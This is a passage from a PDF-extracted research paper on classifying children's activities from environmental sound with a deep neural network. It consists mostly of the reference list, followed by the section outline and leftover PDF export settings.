Systems, 2270–2278. Arasteh H, Hosseinnezhad V, Loia V, Tommasetti A, Troisi O, Shafie-Khah M, Siano P. 2016. Iot-based smart cities: a survey. In: 2016 IEEE 16th International Conference on Environment and Electrical Engineering (EEEIC). Piscataway: IEEE, 1–6. Aron J. 2011. How innovative is Apple’s new voice assistant, Siri? New Scientist. 212(2836):24. Balli S, Sağbaș EA, Peker M. 2019. Human activity recognition from smart watch sensor data using a hybrid of principal component analysis and random forest algorithm. Measurement and Control 52(1–2):37–45. Barbedo JGA. 2018. Impact of dataset size and variety on the effectiveness of deep learning and transfer learning for plant disease classification. Computers and Electronics in Agriculture 153:46–53 DOI 10.1016/j.compag.2018.08.013. Bhat HR, Lone TA, Paul ZM. 2017. Cortana-intelligent personal digital assistant: a review. International Journal of Advanced Research in Computer Science 8(7):55–57. Blanco-Murillo DM, García-Domínguez A, Galván-Tejada CE, Celaya-Padilla JM. 2018. Comparación del nivel de precisión de los clasificadores support vector machines, k nearest neighbors, random forests, extra trees y gradient boosting en el reconocimiento de actividades infantiles utilizando sonido ambiental. Research in Computing Science 147(5):281–290 DOI 10.13053/rcs-147-5-21. Blasco R, Marco Á, Casas R, Cirujano D, Picking R. 2014. A smart kitchen for ambient assisted living. Sensors 14(1):1629–1653 DOI 10.3390/s140101629. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 16/22 http://dx.doi.org/10.7717/peerj-cs.308#supplemental-information http://dx.doi.org/10.7717/peerj-cs.308#supplemental-information http://dx.doi.org/10.7717/peerj-cs.308#supplemental-information http://dx.doi.org/10.1186/s13174-015-0041-5 http://dx.doi.org/10.1080/10630732.2014.942092 http://dx.doi.org/10.1016/j.compag.2018.08.013 http://dx.doi.org/10.13053/rcs-147-5-21 http://dx.doi.org/10.3390/s140101629 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Boufama B, Habashi P, Ahmad IS. 2017. Trajectory-based human activity recognition from videos. In: 2017 International Conference on Advanced Technologies for Signal and Image Processing (ATSIP). Piscataway: IEEE, 1–5. Boughorbel S, Breebaart J, Bruekers F, Flinsenberg I, Kate WT. 2010. Child-activity recognition from multi-sensor data. In: Proceedings of the 7th International Conference on Methods and Techniques in Behavioral Research-MB 10. Brophy E, Muehlhausen W, Smeaton AF, Ward TE. 2020. Optimised convolutional neural networks for heart rate estimation and human activity recognition in wrist worn sensing applications. ArXiv. Available at https://arxiv.org/abs/2004.00505. Burbano D, Carrera JL. 2015. Human activity recognition in a car with embedded devices. Latin American Journal of Computing Faculty of Systems Engineering Escuela Politécnica Nacional Quito-Ecuador 2(2):33–39. Caba Heilbron F, Escorcia V, Ghanem B, Carlos Niebles J. 2015. Activitynet: a large-scale video benchmark for human activity understanding. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 961–970. Capela NA, Lemaire ED, Baddour N. 2015. Feature selection for wearable smartphone-based human activity recognition with able bodied, elderly, and stroke patients. PLOS ONE 10(4): e0124414 DOI 10.1371/journal.pone.0124414. Chen Z, Zhu Q, Soh YC, Zhang L. 2017. Robust human activity recognition using smartphone sensors via CT-PCA and online SVM. IEEE Transactions on Industrial Informatics 13(6):3070– 3080 DOI 10.1109/TII.2017.2712746. Chollet F. 2018. Keras: the Python deep learning library. Houghton: Astrophysics Source Code Library. Christoffersen P, Jacobs K. 2004. The importance of the loss function in option valuation. Journal of Financial Economics 72(2):291–318 DOI 10.1016/j.jfineco.2003.02.001. Cippitelli E, Gasparrini S, Gambi E, Spinsante S. 2016. A human activity recognition system using skeleton data from rgbd sensors. Computational Intelligence and Neuroscience 2016:21. Concone F, Re GL, Morana M. 2019. A fog-based application for human activity recognition using personal smart devices. ACM Transactions on Internet Technology (TOIT) 19(2):1–20 DOI 10.1145/3266142. Cook DJ, Augusto JC, Jakkula VR. 2009. Ambient intelligence: technologies, applications, and opportunities. Pervasive and Mobile Computing 5(4):277–298 DOI 10.1016/j.pmcj.2009.04.001. Corno F, De Russis L. 2016. Training engineers for the ambient intelligence challenge. IEEE Transactions on Education 60(1):40–49 DOI 10.1109/TE.2016.2608785. Cristani M, Karafili E, Tomazzoli C. 2015. Improving energy saving techniques by ambient intelligence scheduling. In: 2015 IEEE 29th International Conference on Advanced Information Networking and Applications. Piscataway: IEEE, 324–331. De la Concepción MÁÁ, Morillo LMS, Garca JAÁ, González-Abril L. 2017. Mobile activity recognition and fall detection system for elderly people using ameva algorithm. Pervasive and Mobile Computing 34:3–13 DOI 10.1016/j.pmcj.2016.05.002. Dehghani A, Glatard T, Shihab E. 2019. Subject cross validation in human activity recognition. ArXiv. Available at http://arxiv.org/abs/1904.02666. Delgado-Contreras JR, Garća-Vázquez JP, Brena RF, Galván-Tejada CE, Galván-Tejada JI. 2014. Feature selection for place classification through environmental sounds. Procedia Computer Science 37:40–47. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 17/22 https://arxiv.org/abs/2004.00505 http://dx.doi.org/10.1371/journal.pone.0124414 http://dx.doi.org/10.1109/TII.2017.2712746 http://dx.doi.org/10.1016/j.jfineco.2003.02.001 http://dx.doi.org/10.1145/3266142 http://dx.doi.org/10.1016/j.pmcj.2009.04.001 http://dx.doi.org/10.1109/TE.2016.2608785 http://dx.doi.org/10.1016/j.pmcj.2016.05.002 http://arxiv.org/abs/1904.02666 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Dutta S, Gros E. 2018. Evaluation of the impact of deep learning architectural components selection and dataset size on a medical imaging task. In: Medical Imaging 2018: Imaging Informatics for Healthcare, Research, and Applications, International Society for Optics and Photonics, 10579:1057911. Fatima M, Pasha M. 2017. Survey of machine learning algorithms for disease diagnostic. Journal of Intelligent Learning Systems and Applications 9(1):1–16 DOI 10.4236/jilsa.2017.91001. Galván-Tejada CE, Galván-Tejada JI, Celaya-Padilla JM, Delgado-Contreras JR, Magallanes-Quintanar R, Martinez-Fierro ML, Garza-Veloz I, López-Hernández Y, Gamboa-Rosales H. 2016. An analysis of audio features to develop a human activity recognition model using genetic algorithms, random forests, and neural networks. Mobile Information Systems 2016:1784101 DOI 10.1155/2016/1784101. Garca-Dominguez A, Galván-Tejada CE, Zanella-Calzada LA, Gamboa-Rosales H, Galván-Tejada JI, Celaya-Padilla JM, Luna-Garca H, Magallanes-Quintanar R. 2020. Feature selection using genetic algorithms for the generation of a recognition and classification of children activities model using environmental sound. Mobile Information Systems 2020:8617430 DOI 10.1155/2020/8617430. Garca-Domnguez A, Zanella-Calzada LA, Galván-Tejada CE, Galván-Tejada JI, Celaya-Padilla JM. 2019. Evaluation of five classifiers for children activity recognition with sound as information source and akaike criterion for feature selection. In: Mexican Conference on Pattern Recognition, Berlin: Springer, 398–407. Gupta A, Pandey OJ, Shukla M, Dadhich A, Ingle A, Gawande P. 2014. Towards context-aware smart mechatronics networks: integrating swarm intelligence and ambient intelligence. In: 2014 International Conference on Issues and Challenges in Intelligent Computing Techniques (ICICT). Piscataway: IEEE, 64–69. Hammerla NY, Halloran S, Plötz T. 2016. Deep, convolutional, and recurrent models for human activity recognition using wearables. Available at https://arxiv.org/abs/1604.08880. Hassan MM, Uddin MZ, Mohamed A, Almogren A. 2018. A robust human activity recognition system using smartphone sensors and deep learning. Future Generation Computer Systems 81:307–313 DOI 10.1016/j.future.2017.11.029. Hershey S, Chaudhuri S, Ellis DP, Gemmeke JF, Jansen A, Moore RC, Plakal M, Platt D, Saurous RA, Seybold B, Slaney M, Weiss RJ, Wilson K. 2017. Cnn architectures for large-scale audio classification. In: 2017 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 131–135. Hoy MB. 2018. Alexa, siri, cortana, and more: an introduction to voice assistants. Medical Reference Services Quarterly 37(1):81–88 DOI 10.1080/02763869.2018.1404391. Hu L, Ni Q. 2017. Iot-driven automated object detection algorithm for urban surveillance systems in smart cities. IEEE Internet of Things Journal 5(2):747–754 DOI 10.1109/JIOT.2017.2705560. Ignatov A. 2018. Real-time human activity recognition from accelerometer data using convolutional neural networks. Applied Soft Computing 62:915–922 DOI 10.1016/j.asoc.2017.09.027. Jiang W, Yin Z. 2015. Human activity recognition using wearable sensors by deep convolutional neural networks. In: Proceedings of the 23rd ACM International Conference on Multimedia. New York: ACM, 1307–1310. Jordan MI, Mitchell TM. 2015. Machine learning: trends, perspectives, and prospects. Science 349(6245):255–260 DOI 10.1126/science.aaa8415. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 18/22 http://dx.doi.org/10.4236/jilsa.2017.91001 http://dx.doi.org/10.1155/2016/1784101 http://dx.doi.org/10.1155/2020/8617430 https://arxiv.org/abs/1604.08880 http://dx.doi.org/10.1016/j.future.2017.11.029 http://dx.doi.org/10.1080/02763869.2018.1404391 http://dx.doi.org/10.1109/JIOT.2017.2705560 http://dx.doi.org/10.1016/j.asoc.2017.09.027 http://dx.doi.org/10.1126/science.aaa8415 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Jordao A, Nazare AC Jr, Sena J, Schwartz WR. 2018. Human activity recognition based on wearable sensor data: A standardization of the state-of-the-art. ArXiv. Available at https://arxiv.org/abs/1806.05226. Karlik B, Olgac AV. 2011. Performance analysis of various activation functions in generalized mlp architectures of neural networks. International Journal of Artificial Intelligence and Expert Systems 1(4):111–122. Kepuska V, Bohouta G. 2018. Next-generation of virtual personal assistants (microsoft cortana, apple siri, amazon alexa and google home). In: 2018 IEEE 8th Annual Computing and Communication Workshop and Conference (CCWC). Piscataway: IEEE, 99–103. Keras Team. 2020. Keras documentation: Adam. Available at https://keras.io/api/optimizers/adam/ (accessed 8 September 2020). Ketkar N. 2017. Introduction to Keras. In: Deep Learning with Python. Berlin: Springer, 97–111. Kia MB, Pirasteh S, Pradhan B, Mahmud AR, Sulaiman WNA, Moradi A. 2012. An artificial neural network model for flood simulation using gis: Johor river basin, Malaysia. Environmental Earth Sciences 67(1):251–264 DOI 10.1007/s12665-011-1504-z. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv. Available at https://arxiv.org/abs/1412.6980. Koidl K. 2013. Loss functions in classification tasks. Dublin: School of Computer Science and Statistic Trinity College. Kurashima S, Suzuki S. 2015. Improvement of activity recognition for child growth monitoring system at kindergarten. In: IECON 2015-41st Annual Conference of the IEEE Industrial Electronics Society. Piscataway: IEEE, 002596–002601. Lee S-M, Yoon SM, Cho H. 2017. Human activity recognition from accelerometer data using convolutional neural network. In: 2017 IEEE International Conference on Big Data and Smart Computing (BigComp). Piscataway: IEEE, 131–134. Li S, Da Xu L, Zhao S. 2015. The internet of things: a survey. Information Systems Frontiers 17(2):243–259 DOI 10.1007/s10796-014-9492-7. Li X, Zhang Y, Marsic I, Sarcevic A, Burd RS. 2016. Deep learning for rfid-based activity recognition. In: Proceedings of the 14th ACM Conference on Embedded Network Sensor Systems CD-ROM. New York: ACM, 164–175. Liang D, Thomaz E. 2019. Audio-based activities of daily living (adl) recognition with large-scale acoustic embeddings from online videos. Proceedings of the ACM on Interactive, Mobile, Wearable and Ubiquitous Technologies 3(1):17–18 DOI 10.1145/3314404. Liu W, Wen Y, Yu Z, Yang M. 2016. Large-margin softmax loss for convolutional neural networks. ICML 2:7. Lloret J, Canovas A, Sendra S, Parra L. 2015. A smart communication architecture for ambient assisted living. IEEE Communications Magazine 53(1):26–33 DOI 10.1109/MCOM.2015.7010512. López G, Quesada L, Guerrero LA. 2017. Alexa vs. Siri vs. Cortana vs. Google Assistant: a comparison of speech-based natural user interfaces. In: International Conference on Applied Human Factors and Ergonomics, Berlin: Springer, 241–250. Lu H, Zhang H, Nayak A. 2020. A deep neural network for audio classification with a classifier attention mechanism. ArXiv. Available at https://arxiv.org/abs/2006.09815. Lubina P, Rudzki M. 2015. Artificial neural networks in accelerometer-based human activity recognition. In: 2015 22nd International Conference Mixed Design of Integrated Circuits & Systems (MIXDES). Piscataway: IEEE, 63–68. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 19/22 https://arxiv.org/abs/1806.05226 https://keras.io/api/optimizers/adam/ http://dx.doi.org/10.1007/s12665-011-1504-z https://arxiv.org/abs/1412.6980 http://dx.doi.org/10.1007/s10796-014-9492-7 http://dx.doi.org/10.1145/3314404 http://dx.doi.org/10.1109/MCOM.2015.7010512 https://arxiv.org/abs/2006.09815 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Lyu L, He X, Law YW, Palaniswami M. 2017. Privacy-preserving collaborative deep learning with application to human activity recognition. In: Proceedings of the 2017 ACM on Conference on Information and Knowledge Management. New York: ACM, 1219–1228. Mannini A, Rosenberger M, Haskell WL, Sabatini AM, Intille SS. 2017. Activity recognition in youth using single accelerometer placed at wrist or ankle. Medicine and Science in Sports and Exercise 49(4):801–812 DOI 10.1249/MSS.0000000000001144. Mascia M, Canclini A, Antonacci F, Tagliasacchi M, Sarti A, Tubaro S. 2015. Forensic and anti- forensic analysis of indoor/outdoor classifiers based on acoustic clues. In: 23rd European Signal Processing Conference (EUSIPCO). Memon M, Wagner SR, Pedersen CF, Beevi FHA, Hansen FO. 2014. Ambient assisted living healthcare frameworks, platforms, standards, and quality attributes. Sensors 14(3):4312–4341 DOI 10.3390/s140304312. Monteiro J, Granada R, Barros RC, Meneguzzi F. 2017. Deep neural networks for kitchen activity recognition. In: 2017 International Joint Conference on Neural Networks (IJCNN). Murad A, Pyun J-Y. 2017. Deep recurrent neural networks for human activity recognition. Sensors 17(11):2556 DOI 10.3390/s17112556. Myo WW, Wettayaprasit W, Aiyarak P. 2019. Designing classifier for human activity recognition using artificial neural network. In: 2019 IEEE 4th International Conference on Computer and Communication Systems (ICCCS). Piscataway: IEEE, 81–85. Nikam SS. 2015. A comparative study of classification techniques in data mining algorithms. Oriental Journal of Computer Science & Technology 8(1):13–19. Nweke HF, Teh YW, Al-Garadi MA, Alo UR. 2018. Deep learning algorithms for human activity recognition using mobile and wearable sensor networks: state of the art and research challenges. Expert Systems with Applications 105:233–261 DOI 10.1016/j.eswa.2018.03.056. Oyedare T, Park J-MJ. 2019. Estimating the required training dataset size for transmitter classification using deep learning. In: 2019 IEEE International Symposium on Dynamic Spectrum Access Networks (DySPAN). Piscataway: IEEE, 1–10. Paul P, George T. 2015. An effective approach for human activity recognition on smartphone. In: 2015 IEEE International Conference on Engineering and Technology (Icetech). Piscataway: IEEE, 1–3. Piczak KJ. 2015. Environmental sound classification with convolutional neural networks. In: 2015 IEEE 25th International Workshop on Machine Learning for Signal Processing (MLSP). Piscataway: IEEE, 1–6. Rafferty J, Nugent CD, Liu J, Chen L. 2017. From activity recognition to intention recognition for assisted living within smart homes. IEEE Transactions on Human-Machine Systems 47(3):368–379 DOI 10.1109/THMS.2016.2641388. Ramachandran P, Zoph B, Le QV. 2017. Searching for activation functions. ArXiv. Available at https://arxiv.org/abs/1710.05941. Reyes-Ortiz J-L, Oneto L, Samà A, Parra X, Anguita D. 2016. Transition-aware human activity recognition using smartphones. Neurocomputing 171:754–767 DOI 10.1016/j.neucom.2015.07.085. Robinson DC, Sanders DA, Mazharsolook E. 2015. Ambient intelligence for optimal manufacturing and energy efficiency. Assembly Automation 35(3):234–248 DOI 10.1108/AA-11-2014-087. Roda C, Rodrguez AC, López-Jaquero V, Navarro E, González P. 2017. A multi-agent system for acquired brain injury rehabilitation in ambient intelligence environments. Neurocomputing 231:11–18 DOI 10.1016/j.neucom.2016.04.066. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 20/22 http://dx.doi.org/10.1249/MSS.0000000000001144 http://dx.doi.org/10.3390/s140304312 http://dx.doi.org/10.3390/s17112556 http://dx.doi.org/10.1016/j.eswa.2018.03.056 http://dx.doi.org/10.1109/THMS.2016.2641388 https://arxiv.org/abs/1710.05941 http://dx.doi.org/10.1016/j.neucom.2015.07.085 http://dx.doi.org/10.1108/AA-11-2014-087 http://dx.doi.org/10.1016/j.neucom.2016.04.066 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Ronao CA, Cho S-B. 2016. Human activity recognition with smartphone sensors using deep learning neural networks. Expert Systems with Applications 59:235–244 DOI 10.1016/j.eswa.2016.04.032. Rong F. 2016. Audio classification method based on machine learning. In: 2016 International Conference on Intelligent Transportation, Big Data & Smart City (ICITBS). Piscataway: IEEE, 81–84. Rubinstein RY, Kroese DP. 2013. The cross-entropy method: a unified approach to combinatorial optimization, Monte-Carlo simulation and machine learning. Berlin: Springer Science & Business Media. Ruder S. 2016. An overview of gradient descent optimization algorithms. ArXiv. Available at https://arxiv.org/abs/1609.04747. Scheirer ED. 1998. Tempo and beat analysis of acoustic musical signals. Journal of the Acoustical Society of America 103(1):588–601 DOI 10.1121/1.421129. Sebestyen G, Stoica I, Hangan A. 2016. Human activity recognition and monitoring for elderly people. In: 2016 IEEE 12th International Conference on Intelligent Computer Communication and Processing (ICCP). Piscataway: IEEE, 341–347. Shoaib M, Bosch S, Incel OD, Scholten H, Havinga PJ. 2015. A survey of online activity recognition using mobile phones. Sensors 15(1):2059–2085 DOI 10.3390/s150102059. Sim JM, Lee Y, Kwon O. 2015. Acoustic sensor based recognition of human activity in everyday life for smart home services. International Journal of Distributed Sensor Networks 11(9):679123 DOI 10.1155/2015/679123. Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. ArXiv. Available at https://arxiv.org/abs/1409.1556. Sousa Lima W, Souto E, El-Khatib K, Jalali R, Gama J. 2019. Human activity recognition using inertial sensors in a smartphone: an overview. Sensors 19(14):3213 DOI 10.3390/s19143213. Stipanicev D, Bodrozic L, Stula M. 2007. Environmental intelligence based on advanced sensor networks. In: 2007 14th International Workshop on Systems, Signals and Image Processing and 6th EURASIP Conference Focused on Speech and Image Processing, Multimedia Communications and Services. Piscataway: IEEE, 209–212. Stork JA, Spinello L, Silva J, Arras KO. 2012. Audio-based human activity recognition using non-markovian ensemble voting. In: 2012 IEEE RO-MAN: The 21st IEEE International Symposium on Robot and Human Interactive Communication. Piscataway: IEEE. Suto J, Oniga S. 2018. Efficiency investigation of artificial neural networks in human activity recognition. Journal of Ambient Intelligence and Humanized Computing 9(4):1049–1060 DOI 10.1007/s12652-017-0513-5. Tarzia SP, Dinda PA, Dick RP, Memik G. 2011. Indoor localization without infrastructure using the acoustic background spectrum. In: Proceedings of the 9th International Conference on Mobile Systems, Applications, and Services, 155–168. Taylor W, Shah SA, Dashtipour K, Zahid A, Abbasi QH, Imran MA. 2020. An intelligent non- invasive real-time human activity recognition system for next-generation healthcare. Sensors 20(9):2653 DOI 10.3390/s20092653. Trost SG, Cliff D, Ahmadi M, Van Tuc N, Hagenbuchner M. 2018. Sensor-enabled activity class recognition in preschoolers: hip versus wrist data. Medicine and Science in Sports and Exercise 50(3):634–641 DOI 10.1249/MSS.0000000000001460. Uddin MT, Billah MM, Hossain MF. 2016. Random forests based recognition of human activities and postural transitions on smartphone. In: 2016 5th International Conference on Informatics, Electronics and Vision (ICIEV). Piscataway: IEEE, 250–255. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 21/22 http://dx.doi.org/10.1016/j.eswa.2016.04.032 https://arxiv.org/abs/1609.04747 http://dx.doi.org/10.1121/1.421129 http://dx.doi.org/10.3390/s150102059 http://dx.doi.org/10.1155/2015/679123 https://arxiv.org/abs/1409.1556 http://dx.doi.org/10.3390/s19143213 http://dx.doi.org/10.1007/s12652-017-0513-5 http://dx.doi.org/10.3390/s20092653 http://dx.doi.org/10.1249/MSS.0000000000001460 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Uddin MT, Uddiny MA. 2015. Human activity recognition from wearable sensors using extremely randomized trees. In: 2015 International Conference on Electrical Engineering and Information Communication Technology (ICEEICT). Piscataway: IEEE, 1–6. Uddin MZ. 2019. A wearable sensor-based activity prediction system to facilitate edge computing in smart healthcare system. Journal of Parallel and Distributed Computing 123:46–53 DOI 10.1016/j.jpdc.2018.08.010. Van der Oord A, Dieleman S, Zen H, Simonyan K, Vinyals O, Graves A, Kalchbrenner N, Senior A, Kavukcuoglu K. 2016. Wavenet: a generative model for raw audio. ArXiv. Available at https://arxiv.org/abs/1609.03499. Van Rossum G. 2007. Python programming language. In: USENIX Annual Technical Conference, 41:36. Wang A, Chen G, Yang J, Zhao S, Chang C-Y. 2016. A comparative study on human activity recognition using inertial sensors in a smartphone. IEEE Sensors Journal 16(11):4566–4578 DOI 10.1109/JSEN.2016.2545708. Wang H, Divakaran A, Vetro A, Chang S-F, Sun H. 2003. Survey of compressed-domain features used in audio-visual indexing and analysis. Journal of Visual Communication and Image Representation 14(2):150–183 DOI 10.1016/S1047-3203(03)00019-1. Wang S, Zhou G. 2015. A review on radio based activity recognition. Digital Communications and Networks 1(1):20–29 DOI 10.1016/j.dcan.2015.02.006. Westeyn TL, Abowd GD, Starner TE, Johnson JM, Presti PW, Weaver KA. 2011. Monitoring children’s developmental progress using augmented toys and activity recognition. Personal and Ubiquitous Computing 16(2):169–191 DOI 10.1007/s00779-011-0386-0. Wortmann F, Flüchter K. 2015. Internet of things. Business & Information Systems Engineering 57(3):221–224 DOI 10.1007/s12599-015-0383-3. Yarotsky D. 2017. Error bounds for approximations with deep relu networks. Neural Networks 94:103–114 DOI 10.1016/j.neunet.2017.07.002. Zeng Y, Mao H, Peng D, Yi Z. 2019. Spectrogram based multi-task audio classification. Multimedia Tools and Applications 78(3):3705–3722 DOI 10.1007/s11042-017-5539-3. Zhang S, Qin Y, Sun K, Lin Y. 2019. Few-shot audio classification with attentional graph neural networks. In: INTERSPEECH, 3649–3653. Ziuziański P, Furmankiewicz M, Sołtysik-Piorunkiewicz A. 2014. E-health artificial intelligence system implementation: case study of knowledge management dashboard of epidemiological data in Poland. International Journal of Biology and Biomedical Engineering 8:164–171. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 22/22 http://dx.doi.org/10.1016/j.jpdc.2018.08.010 https://arxiv.org/abs/1609.03499 http://dx.doi.org/10.1109/JSEN.2016.2545708 http://dx.doi.org/10.1016/S1047-3203(03)00019-1 http://dx.doi.org/10.1016/j.dcan.2015.02.006 http://dx.doi.org/10.1007/s00779-011-0386-0 http://dx.doi.org/10.1007/s12599-015-0383-3 http://dx.doi.org/10.1016/j.neunet.2017.07.002 http://dx.doi.org/10.1007/s11042-017-5539-3 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Deep artificial neural network based on environmental sound data for the generation of a children activity classification model Introduction Materials and Methods Experiments and results Discussion Conclusions Future work References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA 